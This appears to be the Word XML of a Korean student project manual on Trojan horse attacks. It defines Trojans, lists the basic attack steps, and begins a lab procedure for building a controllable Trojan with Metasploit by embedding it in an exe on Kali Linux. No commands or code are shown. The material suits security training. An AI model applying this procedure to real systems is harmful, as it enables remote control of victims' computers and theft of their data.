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B7D7D8">
    <v:background id="_x0000_s1025" fillcolor="#b7d7d8" o:bwmode="white">
      <v:fill type="pattern" color2="#edf7f5" o:title="점선 눈금" r:id="rId4"/>
    </v:background>
  </w:background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:rsidTr="7A21B6C8" w14:paraId="6324ACA9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DE047E" w:rsidP="00836B5D" w:rsidRDefault="00DE047E" w14:paraId="5E0ACFB2" w14:textId="57E71F94">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia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DE047E" w:rsidP="00836B5D" w:rsidRDefault="00DE047E" w14:paraId="5FCEBBE6" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia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DE047E" w:rsidP="00836B5D" w:rsidRDefault="00DE047E" w14:paraId="190B5766" w14:textId="44E9A2A9">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00810D7F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>K</w:t>
            </w:r>
            <w:r w:rsidRPr="00810D7F">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia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hint="eastAsia" w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac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hint="eastAsia" w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac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hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r w:rsidRPr="00810D7F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>기</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="00DE047E" w:rsidR="00810D7F" w:rsidTr="7A21B6C8" w14:paraId="4DE911D3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1F1424C8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62D3CAEB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721C9766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810D7F" w:rsidTr="7A21B6C8" w14:paraId="70396986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073EDD83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11C4AFAD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41944575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810D7F" w:rsidTr="7A21B6C8" w14:paraId="5AE5FB7E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3D9C1618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28087102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66E42ED8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810D7F" w:rsidTr="7A21B6C8" w14:paraId="2C9DFD5B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40E1B723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2E3B97AD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3F369925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810D7F" w:rsidTr="7A21B6C8" w14:paraId="74A49F28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59C3199B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2CBA40D4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0055BF9D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810D7F" w:rsidTr="7A21B6C8" w14:paraId="7939AD8C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169A88C7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417DEDC5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1717703E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810D7F" w:rsidTr="7A21B6C8" w14:paraId="55FF65DE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65A8507B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05247992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63588551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435F8A" w:rsidTr="7A21B6C8" w14:paraId="0C58FACA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435F8A" w:rsidP="00836B5D" w:rsidRDefault="00435F8A" w14:paraId="1100A99D" w14:textId="144B683C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435F8A" w:rsidP="00836B5D" w:rsidRDefault="00435F8A" w14:paraId="33ED0819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DE047E" w:rsidR="00435F8A" w:rsidP="00836B5D" w:rsidRDefault="00435F8A" w14:paraId="09665CAE" w14:textId="64185710">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:hAnsi="DX인생극장B" w:eastAsia="DX인생극장B"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="7A21B6C8" w:rsidR="7A21B6C8">
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:hAnsi="DX인생극장B" w:eastAsia="DX인생극장B"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>작성: 고승원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435F8A" w:rsidP="00836B5D" w:rsidRDefault="00435F8A" w14:paraId="436ECA70" w14:textId="147FE44F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435F8A" w:rsidTr="7A21B6C8" w14:paraId="2485F3F2" w14:textId="77777777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435F8A" w:rsidP="00836B5D" w:rsidRDefault="00435F8A" w14:paraId="71CD62D3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color="204E5F" w:sz="24" w:space="0"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="thinThickSmallGap" w:color="204E5F" w:sz="24" w:space="0"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidRPr="001F0BA1" w:rsidR="00435F8A" w:rsidP="00836B5D" w:rsidRDefault="0079744A" w14:paraId="32D8D39D" w14:textId="5BD66271">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:hAnsi="DX인생극장B" w:eastAsia="DX인생극장B"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="DX인생극장B" w:hAnsi="DX인생극장B" w:eastAsia="DX인생극장B"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
              <w:t>최종프로젝트 매뉴얼 양식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435F8A" w:rsidP="00836B5D" w:rsidRDefault="00435F8A" w14:paraId="01F80FE2" w14:textId="781E05FE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</w:tr>
      <w:tr w:rsidRPr="00DE047E" w:rsidR="00810D7F" w:rsidTr="7A21B6C8" w14:paraId="190BD00C" w14:textId="77777777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186A4FC3" w14:textId="77777777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810D7F" w:rsidR="00810D7F" w:rsidP="00836B5D" w:rsidRDefault="00707ECA" w14:paraId="58F5F3D3" w14:textId="75A9F4C1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:hAnsi="DX인생극장B" w:eastAsia="DX인생극장B"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="7A21B6C8" w:rsidR="7A21B6C8">
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:hAnsi="DX인생극장B" w:eastAsia="DX인생극장B"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>트로이목마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1D9FDDC7" w14:textId="4388ADB6">
            <w:pPr>
              <w:jc w:val="right"/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</w:tr>
      <w:tr w:rsidRPr="00DE047E" w:rsidR="00810D7F" w:rsidTr="7A21B6C8" w14:paraId="68E102FE" w14:textId="77777777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364E9C09" w14:textId="77777777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00C4D200" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:hAnsi="DX인생극장B" w:eastAsia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19B8FD7A" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="right"/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</w:tr>
      <w:tr w:rsidRPr="00DE047E" w:rsidR="00DE047E" w:rsidTr="7A21B6C8" w14:paraId="76FD6D8B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DE047E" w:rsidP="00836B5D" w:rsidRDefault="00DE047E" w14:paraId="75390B09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DE047E" w:rsidP="00836B5D" w:rsidRDefault="00DE047E" w14:paraId="28695EB1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DE047E" w:rsidP="00836B5D" w:rsidRDefault="00DE047E" w14:paraId="6D62810B" w14:textId="6479F329">
            <w:pPr>
              <w:jc w:val="right"/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</w:tr>
      <w:tr w:rsidRPr="00DE047E" w:rsidR="00810D7F" w:rsidTr="7A21B6C8" w14:paraId="1C780E1C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68CDAD16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E047E" w:rsidR="00810D7F" w:rsidP="00836B5D" w:rsidRDefault="00810D7F" w14:paraId="35761157" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:hAnsi="DX인생극장B" w:eastAsia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0D84031C" w14:textId="6C177B51">
            <w:pPr>
              <w:jc w:val="right"/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</w:tr>
      <w:tr w:rsidRPr="00DE047E" w:rsidR="00810D7F" w:rsidTr="7A21B6C8" w14:paraId="7103841A" w14:textId="77777777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25146133" w14:textId="77777777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810D7F" w:rsidP="00836B5D" w:rsidRDefault="00810D7F" w14:paraId="6B60C0EA" w14:textId="77777777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  <w:p w:rsidR="00810D7F" w:rsidP="00836B5D" w:rsidRDefault="00810D7F" w14:paraId="1B09F378" w14:textId="77777777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  <w:p w:rsidR="00810D7F" w:rsidP="00836B5D" w:rsidRDefault="00810D7F" w14:paraId="62B969F8" w14:textId="77777777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  <w:p w:rsidR="00810D7F" w:rsidP="00836B5D" w:rsidRDefault="00810D7F" w14:paraId="28644DCA" w14:textId="77777777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  <w:p w:rsidRPr="00810D7F" w:rsidR="00810D7F" w:rsidP="00836B5D" w:rsidRDefault="00810D7F" w14:paraId="19E1A7E3" w14:textId="7E233990">
            <w:pPr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Pr="00810D7F" w:rsidR="00810D7F" w:rsidP="00836B5D" w:rsidRDefault="00810D7F" w14:paraId="00F27873" w14:textId="5BE2B0C2">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DE047E" w:rsidP="00836B5D" w:rsidRDefault="00DE047E" w14:paraId="4C621116" w14:textId="69366842"/>
    <w:p w:rsidR="00DE047E" w:rsidP="00836B5D" w:rsidRDefault="00DE047E" w14:paraId="674AA210" w14:textId="353823D8"/>
    <w:p w:rsidR="00DE047E" w:rsidP="00836B5D" w:rsidRDefault="00DE047E" w14:paraId="45C3DBC0" w14:textId="05D23D21"/>
    <w:p w:rsidR="00DE047E" w:rsidP="00836B5D" w:rsidRDefault="00DE047E" w14:paraId="688F1889" w14:textId="77777777"/>
    <w:p w:rsidR="00ED11CF" w:rsidRDefault="00ED11CF" w14:paraId="17464253" w14:textId="77777777">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a4"/>
        <w:tblW w:w="10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80" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10890"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F0BA1" w:rsidTr="6E4C3C35" w14:paraId="1ECED905" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="873"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickThinSmallGap" w:color="204E5F" w:sz="24" w:space="0"/>
              <w:bottom w:val="thinThickThinSmallGap" w:color="204E5F" w:sz="24" w:space="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="001F0BA1" w:rsidR="001F0BA1" w:rsidP="7A21B6C8" w:rsidRDefault="001F0BA1" w14:paraId="2914D227" w14:textId="6F69E500">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:bidi w:val="0"/>
              <w:spacing w:beforeLines="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
              <w:ind w:leftChars="0" w:right="96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40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="07B3161E" w:rsidR="07B3161E">
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:hAnsi="DX인생극장B" w:eastAsia="DX인생극장B"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Trojan Horse Attack 개요</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F0BA1" w:rsidTr="6E4C3C35" w14:paraId="1F0494B8" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="345"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickThinSmallGap" w:color="204E5F" w:sz="24" w:space="0"/>
            </w:tcBorders>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="69C5DF5B" w:rsidP="69C5DF5B" w:rsidRDefault="69C5DF5B" w14:paraId="394DACE4" w14:textId="11B0B227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  <w:r w:rsidRPr="69C5DF5B" w:rsidR="69C5DF5B">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
              <w:t xml:space="preserve">1.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Trojan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Horse이란?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="69C5DF5B" w:rsidP="69C5DF5B" w:rsidRDefault="69C5DF5B" w14:paraId="349E0B33" w14:textId="57259E76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="69C5DF5B" w:rsidR="69C5DF5B">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
              <w:t>-정상적인 프로그램으로 위장하여 시작부터 끝까지 램에 상주하며, 시스템 내부정보를 공격자의 컴퓨터로 빼돌리는 프로그램이다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="00707ECA" w:rsidR="001F0BA1" w:rsidP="7A21B6C8" w:rsidRDefault="00707ECA" w14:paraId="76CB1FE5" w14:textId="3DECAA39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  <w:r w:rsidRPr="7A21B6C8" w:rsidR="7A21B6C8">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
              <w:t>- 바이러스와 달리 직접 전파 능력이 없으면, P2P,메일등의 간접적인 전파경로로 사용자에게 전달된다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="69C5DF5B" w:rsidP="69C5DF5B" w:rsidRDefault="69C5DF5B" w14:paraId="0E723D3D" w14:textId="5A5C6772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  <w:r w:rsidRPr="69C5DF5B" w:rsidR="69C5DF5B">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
              <w:t xml:space="preserve">- 좀비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PC처럼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내부정보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유출뿐만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아니라 컨트롤까지 가능한 종류가 있고, 단순히 내부 데이터만 유출할 수 있는 타입 트로이목마가 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="69C5DF5B" w:rsidP="69C5DF5B" w:rsidRDefault="69C5DF5B" w14:paraId="20018021" w14:textId="1C0F84A3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  <w:r w:rsidRPr="69C5DF5B" w:rsidR="69C5DF5B">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
              <w:t xml:space="preserve">2.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Trojan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Horse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Attack 달성 조건</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="69C5DF5B" w:rsidP="69C5DF5B" w:rsidRDefault="69C5DF5B" w14:paraId="47B18173" w14:textId="760D3C46">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>
              </w:numPr>
              <w:ind w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:cs="나눔스퀘어_ac" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
              </w:rPr>
            </w:pP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공격대상PC에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트로이목마가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포함되어있는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파일을 공격대상이 </w:t>
            </w:r>
            <w:r w:rsidRPr="69C5DF5B" w:rsidR="69C5DF5B">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
              <w:t>실행시켜야한다</w:t>
            </w:r>
            <w:r w:rsidRPr="69C5DF5B" w:rsidR="69C5DF5B">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="69C5DF5B" w:rsidP="69C5DF5B" w:rsidRDefault="69C5DF5B" w14:paraId="1ABBE254" w14:textId="1B3B8D45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  <w:r w:rsidRPr="69C5DF5B" w:rsidR="69C5DF5B">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
              <w:t xml:space="preserve">3.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Trojan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Horse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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="69C5DF5B" w:rsidR="69C5DF5B">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
              <w:t>Attack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="69C5DF5B" w:rsidR="69C5DF5B">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
              <w:t xml:space="preserve"> 공격 기본 절차</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="69C5DF5B" w:rsidP="69C5DF5B" w:rsidRDefault="69C5DF5B" w14:paraId="07E999E4" w14:textId="56FECC8B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  <w:r w:rsidRPr="6E4C3C35" w:rsidR="6E4C3C35">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
              <w:t>-트로이목마가 있는 공격 파일을 생성하는 방법이나, 활용하는 방법이 다르지만 기본적으로는 다음과 같다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="69C5DF5B" w:rsidP="6E4C3C35" w:rsidRDefault="69C5DF5B" w14:paraId="7CA6D9DC" w14:textId="3442D01B">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:ind w:leftChars="0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Pr="6E4C3C35" w:rsidR="6E4C3C35">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
              <w:t>공격자가 만든 트로이목마가 포함된 프로그램을 생성한다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="6E4C3C35" w:rsidP="6E4C3C35" w:rsidRDefault="6E4C3C35" w14:paraId="5DDA5F4D" w14:textId="57EB7E33">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:ind w:leftChars="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidRPr="6E4C3C35" w:rsidR="6E4C3C35">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
              <w:t xml:space="preserve">공격자가 생성한 프로그램을 공격대상이 </w:t>
            </w:r>
            <w:r w:rsidRPr="6E4C3C35" w:rsidR="6E4C3C35">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
              <w:t>다운받는다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="6E4C3C35" w:rsidP="6E4C3C35" w:rsidRDefault="6E4C3C35" w14:paraId="70D3DC67" w14:textId="256FAB20">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:ind w:leftChars="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidRPr="6E4C3C35" w:rsidR="6E4C3C35">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
              <w:t>다운받은 프로그램을 실행한다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="6E4C3C35" w:rsidP="6E4C3C35" w:rsidRDefault="6E4C3C35" w14:paraId="29BEA2E1" w14:textId="17F7627F">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:ind w:leftChars="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidRPr="6E4C3C35" w:rsidR="6E4C3C35">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
              <w:t xml:space="preserve">공격자가 공격대상의 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="6E4C3C35" w:rsidR="6E4C3C35">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
              <w:t>PC에</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="6E4C3C35" w:rsidR="6E4C3C35">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
              <w:t xml:space="preserve"> 접속한다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="69C5DF5B" w:rsidP="69C5DF5B" w:rsidRDefault="69C5DF5B" w14:paraId="4412D38B" w14:textId="7876F1C3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</w:p>
          <w:p w:rsidR="69C5DF5B" w:rsidP="69C5DF5B" w:rsidRDefault="69C5DF5B" w14:paraId="74680B1F" w14:textId="6524AF8C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</w:p>
          <w:p w:rsidRPr="00707ECA" w:rsidR="001F0BA1" w:rsidP="7A21B6C8" w:rsidRDefault="00707ECA" w14:paraId="288C0766" w14:textId="654CC831">
            <w:pPr>
              <w:pStyle w:val="a0"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="07B3161E" w:rsidTr="6E4C3C35" w14:paraId="1C8B43B1">
        <w:trPr>
          <w:trHeight w:val="345"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickThinSmallGap" w:color="204E5F" w:sz="24" w:space="0"/>
            </w:tcBorders>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="07B3161E" w:rsidP="07B3161E" w:rsidRDefault="07B3161E" w14:paraId="284F76B0" w14:textId="47889219">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:ind w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:hAnsi="DX국민시대" w:eastAsia="DX국민시대" w:cs="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="07B3161E" w:rsidR="07B3161E">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:hAnsi="DX국민시대" w:eastAsia="DX국민시대" w:cs="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>공격절차</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="07B3161E" w:rsidTr="6E4C3C35" w14:paraId="3E63CEE1">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickThinSmallGap" w:color="204E5F" w:sz="24" w:space="0"/>
            </w:tcBorders>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="07B3161E" w:rsidP="07B3161E" w:rsidRDefault="07B3161E" w14:paraId="6E25366B" w14:textId="386062D0">
            <w:pPr>
              <w:pStyle w:val="a0"/>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F0BA1" w:rsidTr="6E4C3C35" w14:paraId="5BAB6D7D" w14:textId="06E6A203">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00B67587" w:rsidR="003D753D" w:rsidP="7A21B6C8" w:rsidRDefault="00B67587" w14:paraId="58E1FB05" w14:textId="20FB27E2">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:ind w:leftChars="0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proofErr w:type="spellStart"/>
            <w:r w:rsidR="6E4C3C35">
              <w:rPr/>
              <w:t>Metasploit으로</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="6E4C3C35">
              <w:rPr/>
              <w:t xml:space="preserve"> 트로이목마 제작(컨트롤까지 가능한 종류)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7966" w:rsidTr="6E4C3C35" w14:paraId="2F934618" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00BE7966" w:rsidR="00BE7966" w:rsidP="00836B5D" w:rsidRDefault="00BE7966" w14:paraId="1DA7206A" w14:textId="5D2FCBA3">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:hAnsi="D2Coding" w:eastAsia="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline wp14:editId="2068671A" wp14:anchorId="0CC126F4">
                  <wp:extent cx="4286250" cy="4572000"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="11761781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19e2bc6825420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2862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66" w:rsidTr="6E4C3C35" w14:paraId="3873B613" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B7D7D8"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00BE7966" w:rsidR="00BE7966" w:rsidP="00836B5D" w:rsidRDefault="00CD7C05" w14:paraId="3144D387" w14:textId="4F9259F1">
            <w:pPr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① 트로이목마를 심을 exe파일을 준비한다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7966" w:rsidTr="6E4C3C35" w14:paraId="5A05851E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00BE7966" w:rsidR="00BE7966" w:rsidP="7A21B6C8" w:rsidRDefault="00CD7C05" w14:paraId="2F6BEA3A" w14:textId="7D757040">
            <w:pPr>
              <w:pStyle w:val="a0"/>
              <w:ind w:left="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- 실행파일을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kali리눅스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안에 옮긴다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="7A21B6C8" w:rsidTr="6E4C3C35" w14:paraId="4BA32DE2">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
